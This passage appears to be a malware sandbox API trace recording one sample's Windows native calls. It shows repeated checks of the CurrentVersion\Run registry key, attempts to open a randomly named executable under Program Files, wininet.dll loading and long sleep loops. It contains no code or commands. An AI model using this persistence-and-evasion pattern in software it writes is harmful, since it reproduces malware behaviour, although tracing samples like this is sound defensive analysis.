EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0273.192] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0273.192] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0273.193] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0273.390] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0273.390] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0273.426] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0273.426] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0273.426] NtClose (Handle=0x14c) returned 0x0 [0273.426] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0273.426] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0273.426] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0273.426] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0273.427] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0273.427] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0273.427] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0273.427] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0273.821] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0273.822] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0273.864] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0273.864] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0273.864] NtClose (Handle=0x14c) returned 0x0 [0273.864] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0273.865] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0273.865] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0273.865] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0273.865] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0273.865] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0273.865] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0273.866] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0274.049] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0274.056] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0274.097] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0274.097] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0274.097] NtClose (Handle=0x14c) returned 0x0 [0274.097] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0274.097] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0274.097] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0274.097] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0274.097] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0274.097] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0274.097] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0274.098] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0274.290] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0274.291] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0274.302] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0274.303] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0274.303] NtClose (Handle=0x14c) returned 0x0 [0274.303] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0274.303] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0274.303] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0274.303] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0274.303] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0274.303] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0274.303] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0274.303] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0274.477] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0274.478] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) Thread: id = 134 os_tid = 0xee8 Thread: id = 137 os_tid = 0xf04 [0135.831] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xaaf77c*=0x0, ZeroBits=0x0, RegionSize=0xaaf780*=0x28054, AllocationType=0x3000, Protect=0x4 | out: BaseAddress=0xaaf77c*=0x1f0000, RegionSize=0xaaf780*=0x29000) returned 0x0 [0135.834] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="wininet.dll", BaseAddress=0xaaf768 | out: BaseAddress=0xaaf768*=0x765c0000) returned 0x0 [0135.858] Sleep (dwMilliseconds=0x7d0) [0137.862] Sleep (dwMilliseconds=0x7d0) [0139.885] Sleep (dwMilliseconds=0x7d0) [0143.125] Sleep (dwMilliseconds=0x7d0) [0145.193] Sleep (dwMilliseconds=0x7d0) [0147.205] Sleep (dwMilliseconds=0x7d0) [0149.550] Sleep (dwMilliseconds=0x7d0) [0151.557] Sleep (dwMilliseconds=0x7d0) [0153.648] Sleep (dwMilliseconds=0x7d0) [0155.660] Sleep (dwMilliseconds=0x7d0) [0157.672] Sleep (dwMilliseconds=0x7d0) [0157.688] Sleep (dwMilliseconds=0x7d0) [0157.715] Sleep (dwMilliseconds=0x7d0) [0157.804] Sleep (dwMilliseconds=0x7d0) [0157.816] Sleep (dwMilliseconds=0x7d0) [0157.855] Sleep (dwMilliseconds=0x7d0) [0157.864] Sleep (dwMilliseconds=0x7d0) [0157.875] Sleep (dwMilliseconds=0x7d0) [0157.891] Sleep (dwMilliseconds=0x7d0) [0157.908] Sleep (dwMilliseconds=0x7d0) [0157.927] Sleep (dwMilliseconds=0x7d0) [0157.938] Sleep (dwMilliseconds=0x7d0) [0157.953] Sleep (dwMilliseconds=0x7d0) [0157.969] Sleep (dwMilliseconds=0x7d0) [0157.988] Sleep (dwMilliseconds=0x7d0) [0158.004] Sleep (dwMilliseconds=0x7d0) [0158.017] Sleep (dwMilliseconds=0x7d0) [0158.033] Sleep (dwMilliseconds=0x7d0) [0158.047] Sleep (dwMilliseconds=0x7d0) [0158.066] Sleep (dwMilliseconds=0x7d0) [0158.078] Sleep (dwMilliseconds=0x7d0) [0158.094] Sleep (dwMilliseconds=0x7d0) [0158.109] Sleep (dwMilliseconds=0x7d0) [0158.131] Sleep (dwMilliseconds=0x7d0) [0158.141] Sleep (dwMilliseconds=0x7d0) [0158.156] Sleep (dwMilliseconds=0x7d0) [0158.173] Sleep (dwMilliseconds=0x7d0) [0158.192] Sleep (dwMilliseconds=0x7d0) [0158.204] Sleep (dwMilliseconds=0x7d0) [0158.219] Sleep (dwMilliseconds=0x7d0) [0158.237] Sleep (dwMilliseconds=0x7d0) [0158.250] Sleep (dwMilliseconds=0x7d0) [0158.273] Sleep (dwMilliseconds=0x7d0) [0158.281] Sleep (dwMilliseconds=0x7d0) [0158.297] Sleep (dwMilliseconds=0x7d0) [0158.312] Sleep (dwMilliseconds=0x7d0) [0158.332] Sleep (dwMilliseconds=0x7d0) [0158.345] Sleep (dwMilliseconds=0x7d0) [0158.359] Sleep (dwMilliseconds=0x7d0) [0158.374] Sleep (dwMilliseconds=0x7d0) [0158.395] Sleep (dwMilliseconds=0x7d0) [0158.406] Sleep (dwMilliseconds=0x7d0) [0158.421] Sleep (dwMilliseconds=0x7d0) [0158.437] Sleep (dwMilliseconds=0x7d0) [0158.456] Sleep (dwMilliseconds=0x7d0) [0158.473] Sleep (dwMilliseconds=0x7d0) [0158.484] Sleep (dwMilliseconds=0x7d0) [0158.499] Sleep (dwMilliseconds=0x7d0) [0158.517] Sleep (dwMilliseconds=0x7d0) [0158.538] Sleep (dwMilliseconds=0x7d0) [0158.547] Sleep (dwMilliseconds=0x7d0) [0158.563] Sleep (dwMilliseconds=0x7d0) [0158.577] Sleep (dwMilliseconds=0x7d0) [0158.637] Sleep (dwMilliseconds=0x7d0) [0158.640] Sleep (dwMilliseconds=0x7d0) [0158.675] Sleep (dwMilliseconds=0x7d0) [0158.700] Sleep (dwMilliseconds=0x7d0) [0158.729] Sleep (dwMilliseconds=0x7d0) [0158.768] Sleep (dwMilliseconds=0x7d0) [0158.782] Sleep (dwMilliseconds=0x7d0) [0158.836] Sleep (dwMilliseconds=0x7d0) [0158.845] Sleep (dwMilliseconds=0x7d0) [0158.893] Sleep (dwMilliseconds=0x7d0) [0158.905] Sleep (dwMilliseconds=0x7d0) [0158.936] Sleep (dwMilliseconds=0x7d0) [0158.963] Sleep (dwMilliseconds=0x7d0) [0158.977] Sleep (dwMilliseconds=0x7d0) [0159.014] Sleep (dwMilliseconds=0x7d0) [0159.033] Sleep (dwMilliseconds=0x7d0) [0159.064] Sleep (dwMilliseconds=0x7d0) [0159.094] Sleep (dwMilliseconds=0x7d0) [0159.109] Sleep (dwMilliseconds=0x7d0) [0159.130] Sleep (dwMilliseconds=0x7d0) [0159.139] Sleep (dwMilliseconds=0x7d0) [0159.155] Sleep (dwMilliseconds=0x7d0) [0159.170] Sleep (dwMilliseconds=0x7d0) [0159.190] Sleep (dwMilliseconds=0x7d0) [0159.201] Sleep (dwMilliseconds=0x7d0) [0159.218] Sleep (dwMilliseconds=0x7d0) [0159.233] Sleep (dwMilliseconds=0x7d0) [0159.248] Sleep (dwMilliseconds=0x7d0) [0159.271] Sleep (dwMilliseconds=0x7d0) [0159.280] Sleep (dwMilliseconds=0x7d0) [0159.295] Sleep (dwMilliseconds=0x7d0) [0159.311] Sleep (dwMilliseconds=0x7d0) [0159.337] Sleep (dwMilliseconds=0x7d0) [0159.342] Sleep (dwMilliseconds=0x7d0) [0159.358] Sleep (dwMilliseconds=0x7d0) [0159.373] Sleep (dwMilliseconds=0x7d0) [0159.399] Sleep (dwMilliseconds=0x7d0) [0159.404] Sleep (dwMilliseconds=0x7d0) [0159.420] Sleep (dwMilliseconds=0x7d0) [0159.437] Sleep (dwMilliseconds=0x7d0) [0159.451] Sleep (dwMilliseconds=0x7d0) [0159.473] Sleep (dwMilliseconds=0x7d0) [0159.482] Sleep (dwMilliseconds=0x7d0) [0159.498] Sleep (dwMilliseconds=0x7d0) [0159.514] Sleep (dwMilliseconds=0x7d0) [0159.536] Sleep (dwMilliseconds=0x7d0) [0159.545] Sleep (dwMilliseconds=0x7d0) [0159.560] Sleep (dwMilliseconds=0x7d0) [0159.576] Sleep (dwMilliseconds=0x7d0) [0159.599] Sleep (dwMilliseconds=0x7d0) [0159.611] Sleep (dwMilliseconds=0x7d0) [0159.623] Sleep (dwMilliseconds=0x7d0) [0159.640] Sleep (dwMilliseconds=0x7d0) [0159.654] Sleep (dwMilliseconds=0x7d0) [0159.677] Sleep (dwMilliseconds=0x7d0) [0159.685] Sleep (dwMilliseconds=0x7d0) [0159.700] Sleep (dwMilliseconds=0x7d0) [0159.731] Sleep (dwMilliseconds=0x7d0) [0159.732] Sleep (dwMilliseconds=0x7d0) [0159.749] Sleep (dwMilliseconds=0x7d0) [0159.772] Sleep (dwMilliseconds=0x7d0) [0159.779] Sleep (dwMilliseconds=0x7d0) [0159.794] Sleep (dwMilliseconds=0x7d0) [0159.810] Sleep (dwMilliseconds=0x7d0) [0159.840] Sleep (dwMilliseconds=0x7d0) [0159.841] Sleep (dwMilliseconds=0x7d0) [0159.858] Sleep (dwMilliseconds=0x7d0) [0159.894] Sleep (dwMilliseconds=0x7d0) [0159.904] Sleep (dwMilliseconds=0x7d0) [0159.919] Sleep (dwMilliseconds=0x7d0) [0159.935] Sleep (dwMilliseconds=0x7d0) [0159.950] Sleep (dwMilliseconds=0x7d0) [0159.971] Sleep (dwMilliseconds=0x7d0) [0159.981] Sleep (dwMilliseconds=0x7d0) [0159.997] Sleep (dwMilliseconds=0x7d0) [0160.013] Sleep (dwMilliseconds=0x7d0) [0160.033] Sleep (dwMilliseconds=0x7d0) [0160.044] Sleep (dwMilliseconds=0x7d0) [0160.059] Sleep (dwMilliseconds=0x7d0) [0160.076] Sleep (dwMilliseconds=0x7d0) [0160.099] Sleep (dwMilliseconds=0x7d0) [0160.106] Sleep (dwMilliseconds=0x7d0) [0160.132] Sleep (dwMilliseconds=0x7d0) [0160.137] Sleep (dwMilliseconds=0x7d0) [0160.154] Sleep (dwMilliseconds=0x7d0) [0160.169] Sleep (dwMilliseconds=0x7d0) [0160.190] Sleep (dwMilliseconds=0x7d0) [0160.200] Sleep (dwMilliseconds=0x7d0) [0160.215] Sleep (dwMilliseconds=0x7d0) [0160.231] Sleep (dwMilliseconds=0x7d0) [0160.247] Sleep (dwMilliseconds=0x7d0) [0160.268] Sleep (dwMilliseconds=0x7d0) [0160.278] Sleep (dwMilliseconds=0x7d0) [0160.295] Sleep (dwMilliseconds=0x7d0) [0160.309] Sleep (dwMilliseconds=0x7d0) [0160.329] Sleep (dwMilliseconds=0x7d0) [0160.342] Sleep (dwMilliseconds=0x7d0) [0160.356] Sleep (dwMilliseconds=0x7d0) [0160.371] Sleep (dwMilliseconds=0x7d0) [0160.395] Sleep (dwMilliseconds=0x7d0) [0160.403] Sleep (dwMilliseconds=0x7d0) [0160.418] Sleep (dwMilliseconds=0x7d0) [0160.434] Sleep (dwMilliseconds=0x7d0) [0160.451] Sleep (dwMilliseconds=0x7d0) [0160.474] Sleep (dwMilliseconds=0x7d0) [0160.481] Sleep (dwMilliseconds=0x7d0) [0160.497] Sleep (dwMilliseconds=0x7d0) [0160.519] Sleep (dwMilliseconds=0x7d0) [0160.533] Sleep (dwMilliseconds=0x7d0) [0160.543] Sleep (dwMilliseconds=0x7d0) [0160.558] Sleep (dwMilliseconds=0x7d0) [0160.574] Sleep (dwMilliseconds=0x7d0) [0160.611] Sleep (dwMilliseconds=0x7d0) [0160.621] Sleep (dwMilliseconds=0x7d0) [0160.637] Sleep (dwMilliseconds=0x7d0) [0160.662] Sleep (dwMilliseconds=0x7d0) [0160.668] Sleep (dwMilliseconds=0x7d0) [0160.683] Sleep (dwMilliseconds=0x7d0) [0160.732] Sleep (dwMilliseconds=0x7d0) [0160.746] Sleep (dwMilliseconds=0x7d0) [0160.761] Sleep (dwMilliseconds=0x7d0) [0160.777] Sleep (dwMilliseconds=0x7d0) [0160.793] Sleep (dwMilliseconds=0x7d0) [0160.815] Sleep (dwMilliseconds=0x7d0) [0160.824] Sleep (dwMilliseconds=0x7d0) [0160.853] Sleep (dwMilliseconds=0x7d0) [0160.856] Sleep (dwMilliseconds=0x7d0) [0160.875] Sleep (dwMilliseconds=0x7d0) [0160.887] Sleep (dwMilliseconds=0x7d0) [0160.902] Sleep (dwMilliseconds=0x7d0) [0160.923] Sleep (dwMilliseconds=0x7d0) [0160.939] Sleep (dwMilliseconds=0x7d0) [0160.949] Sleep (dwMilliseconds=0x7d0) [0160.965] Sleep (dwMilliseconds=0x7d0) [0160.980] Sleep (dwMilliseconds=0x7d0) [0160.997] Sleep (dwMilliseconds=0x7d0) [0161.022] Sleep (dwMilliseconds=0x7d0) [0161.026] Sleep (dwMilliseconds=0x7d0) [0161.042] Sleep (dwMilliseconds=0x7d0) [0161.058] Sleep (dwMilliseconds=0x7d0) [0161.079] Sleep (dwMilliseconds=0x7d0) [0161.090] Sleep (dwMilliseconds=0x7d0) [0161.105] Sleep (dwMilliseconds=0x7d0) [0161.122] Sleep (dwMilliseconds=0x7d0) [0161.141] Sleep (dwMilliseconds=0x7d0) [0161.151] Sleep (dwMilliseconds=0x7d0) [0161.167] Sleep (dwMilliseconds=0x7d0) [0161.190] Sleep (dwMilliseconds=0x7d0) [0161.198] Sleep (dwMilliseconds=0x7d0) [0161.214] Sleep (dwMilliseconds=0x7d0) [0161.232] Sleep (dwMilliseconds=0x7d0) [0161.245] Sleep (dwMilliseconds=0x7d0) [0161.269] Sleep (dwMilliseconds=0x7d0) [0161.276] Sleep (dwMilliseconds=0x7d0) [0161.292] Sleep (dwMilliseconds=0x7d0) [0161.307] Sleep (dwMilliseconds=0x7d0) [0161.330] Sleep (dwMilliseconds=0x7d0) [0161.340] Sleep (dwMilliseconds=0x7d0) [0161.354] Sleep (dwMilliseconds=0x7d0) [0161.370] Sleep (dwMilliseconds=0x7d0) [0161.390] Sleep (dwMilliseconds=0x7d0) [0161.401] Sleep (dwMilliseconds=0x7d0) [0161.417] Sleep (dwMilliseconds=0x7d0) [0161.432] Sleep (dwMilliseconds=0x7d0) [0161.449] Sleep (dwMilliseconds=0x7d0) [0161.471] Sleep (dwMilliseconds=0x7d0) [0161.479] Sleep (dwMilliseconds=0x7d0) [0161.494] Sleep (dwMilliseconds=0x7d0) [0161.511] Sleep (dwMilliseconds=0x7d0) [0161.533] Sleep (dwMilliseconds=0x7d0) [0161.541] Sleep (dwMilliseconds=0x7d0) [0161.558] Sleep (dwMilliseconds=0x7d0) [0161.573] Sleep (dwMilliseconds=0x7d0) [0161.595] Sleep (dwMilliseconds=0x7d0) [0161.604] Sleep (dwMilliseconds=0x7d0) [0161.619] Sleep (dwMilliseconds=0x7d0) [0161.636] Sleep (dwMilliseconds=0x7d0) [0161.651] Sleep (dwMilliseconds=0x7d0) [0161.680] Sleep (dwMilliseconds=0x7d0) [0161.682] Sleep (dwMilliseconds=0x7d0) [0161.697] Sleep (dwMilliseconds=0x7d0) 